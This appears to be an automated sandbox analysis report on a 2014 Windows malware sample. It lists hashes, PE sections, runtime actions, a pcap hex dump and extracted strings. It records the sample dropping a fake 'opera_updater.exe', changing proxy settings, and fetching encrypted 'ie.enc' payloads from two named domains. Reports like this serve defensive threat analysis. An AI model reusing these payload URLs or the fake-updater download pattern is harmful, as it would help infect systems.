Analysis Date2014-10-04 14:41:01
MD50af1ead2d5575276cdf145fe9e99055d
SHA1880c40bb487a9d40fa197e8cc4e874cd5dc095dc

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section.rdata md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section.data md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section.rsrc md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section.reloc md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp2014-02-05 03:55:00
PEhash2394682c218c1f7651bd92f22a4a09342e6bc7ab
IMPhash7772dfa3e3a72b92db47c13e7be36e20

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbsitacademy.com
Winsock DNSwahidexpress.com

Network Details:

DNSbsitacademy.com
Type: A
107.150.48.43
DNSwahidexpress.com
Type: A
103.15.74.65
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
Flows TCP192.168.1.1:1031 ➝ 107.150.48.43:80
Flows TCP192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP192.168.1.1:1033 ➝ 107.150.48.43:80
Flows TCP192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap
0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..


Strings
l
\1.scr
C:\0ef05319168d4ea6e80e1da75be0fa94a383a9e86f15db77f1f8dba8857765da
C:\0lXDAvug.exe
C:\166a3b00b55847d77a775764a1bee4761a1c6910020295d2edf998e4563840ab
C:\1oRFNpGw.exe
C:\1QToxUSh.exe
C:\1srfkWkH.exe
C:\1tSwkI_Q.exe
C:\1XVNiGRb.exe
C:\2DGpPc5T.exe
C:\2y6qnqF2.exe
C:\35cac70849c9a622807f9b30f98f4c67cc4f37fa6cc5bc697bcabd2101854762
C:\38116e45cf11c9def2c37fa30e06bc018e46cd9bf891a785b5ba6a5923323d5d
C:\3RSpG5JD.exe
C:\487b40f83626767b4ac5984e18d98f99fb4a29a855746e349fe73a0c83ec2ca3
C:\4OAw6dNj.exe
C:\62eGGURa.exe
C:\6XyPMFPz.exe
C:\7gN7gYzC.exe
C:\7QxouWXz.exe
C:\7ymIe9U4.exe
C:\85c1bcbcb1df218c659f187a6b975a3e805a635b231ecaa523f598a502695a8e
C:\8BUKgAsb.exe
C:\8iD2xfe3.exe
C:\8WFz4opg.exe
C:\90LDUfZ7.exe
C:\95f76a23831a6599512e4d4f58cc2bf54cfa065a766b96091cbc475d9e15665b
C:\9K2UKN2W.exe
C:\9nXXz_EE.exe
C:\9R9GxndA.exe
C:\A94aUTod.exe
C:\ac6bc8b5c6e77d20d8c71df176e613bbfd7bce371987dd408c1355cef7038766
C:\ae7106d17ccf1dfa00d85022a237351a471fee6a6df4895697311caedf72f7cf
C:\aFb_zR5C.exe
C:\aJiQDHmp.exe
C:\aoh7YKiF.exe
C:\aWPFJAp4.exe
C:\aySjDxAm.exe
C:\b99424cbb75f3aca0d9bce5b90d787c810ecf77f3f7a3f7c93ebeda63572f320
C:\BZPk4ssu.exe
C:\CDKo4Ghp.exe
C:\Cj6jWP95.exe
C:\Cs6cTBNe.exe
C:\d2smjgzx.exe
C:\d7143680a75410278c9b95484bc00b271fcf34c23bd0de80aeec3cea7d6cedbc
C:\dfuwp7wT.exe
C:\Documents and Settings\Administrator\
C:\DYEfYtoV.exe
C:\E7Aiu124.exe
C:\EB1ZbEX5.exe
C:\em47xo4g.exe
C:\eo3zZkLG.exe
C:\eRVEqXvp.exe
C:\FJa8_iZT.exe
C:\FKulR4mg.exe
C:\gkF9QPf8.exe
C:\hb9C_kVy.exe
C:\Hlyr8cu6.exe
C:\I7g1NClC.exe
C:\iDBoKK3V.exe
C:\ip0Vt87X.exe
C:\iynSob3w.exe
C:\j2mY72oN.exe
C:\jm5uTqYs.exe
C:\jQSAEp11.exe
C:\Jw0L2zLp.exe
C:\kfAsMA6f.exe
C:\LioP7mJk.exe
C:\lJzJ695v.exe
C:\Lr78kkyl.exe
C:\LW9LFvyo.exe
C:\LXC4kS7e.exe
C:\m7qLCegi.exe
C:\mlD4Pebo.exe
C:\mmfLpLPz.exe
C:\mMu0FlJa.exe
C:\MV_lRsiq.exe
C:\N6oieXD9.exe
C:\NuQlHrG_.exe
C:\o5F_sGrl.exe
C:\O6mPl4CJ.exe
C:\OBN6Wm4b.exe
C:\OfnR0QBs.exe
C:\ONQ8CwrH.exe
C:\onxgW4YJ.exe
C:\OtxunVdk.exe
C:\ow_GN9CF.exe
C:\OzzG044a.exe
C:\pcn9cqvm.exe
C:\pkL1CSOT.exe
C:\pKYELYku.exe
C:\Pl1TpBiT.exe
C:\Q4KdtL_e.exe
C:\Q9p9HrRV.exe
C:\qFCCRxHi.exe
C:\QRmH2e2R.exe
C:\qYxqpebq.exe
C:\rJhXQRa7.exe
C:\rrrNORCR.exe
C:\SBReWEE_.exe
C:\SOZHBfkz.exe
C:\SPc00Dsv.exe
C:\sSnbqHac.exe
C:\tcLaY00T.exe
C:\tGTFm9eA.exe
C:\tHcTvWln.exe
C:\TMtk4JD7.exe
C:\tRe6dTsc.exe
C:\TXzz8BIV.exe
C:\TyMYbWO0.exe
C:\u8EYDKDi.exe
C:\uogryEbX.exe
C:\UowVcj_v.exe
C:\uxk8IO6h.exe
C:\uyulAGYX.exe
C:\V8Fv2uli.exe
C:\Vbd0Y1yA.exe
C:\vEO8rNam.exe
C:\Vh70EiAi.exe
C:\waSEmDhb.exe
C:\X6DtDo8m.exe
C:\xfqsWlNO.exe
C:\XomZXsYG.exe
C:\Xp5PSsUo.exe
C:\XPO1cNIb.exe
C:\xRLei8eC.exe
C:\XWk6vgYT.exe
C:\yENgd8XS.exe
C:\yf66k_1J.exe
C:\yr05wBsQ.exe
C:\yrvtGcT5.exe
C:\ytVvpYAM.exe
C:\YUeYnGj3.exe
C:\ZcBTXBdO.exe
C:\znWA1da2.exe
C:\zRw0S22m.exe
:	;);4;
4%5*5N5U5\5c5i5q5w5~5
5%6I6Y6y6
7%7*7/7?7J7X7^7
7D9Y9^9h9n9w9
absent
_acmdln
_adjust_fdiv
Africa
AhAuhh
AWVAf9
Bagdad
BeginPaint
button
COMCTL32.dll
_controlfp
CreateFileA
CreateWindowExA
:D,*~aB?
@.data
DefWindowProcA
DispatchMessageA
DragQueryFileA
EndPaint
_except_handler3
GDI32.dll
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
;H7-G@
hAAhAA
InitCommonControlsEx
_initterm
iRichu
k{.cee
KERNEL32.dll
KXG[O_
lantie
MSVCRT.dll
 ';(&NK:&]9
o7U"o7U"
__p__commode
__p__fmode
PostQuitMessage
PuZN=0
`.rdata
RegisterClassA
@.reloc
SendMessageA
__set_app_type
__setusermatherr
SHELL32.dll
ShowWindow
solienty
static
TextOutA
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
uAhhAhA
USER32.dll
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>(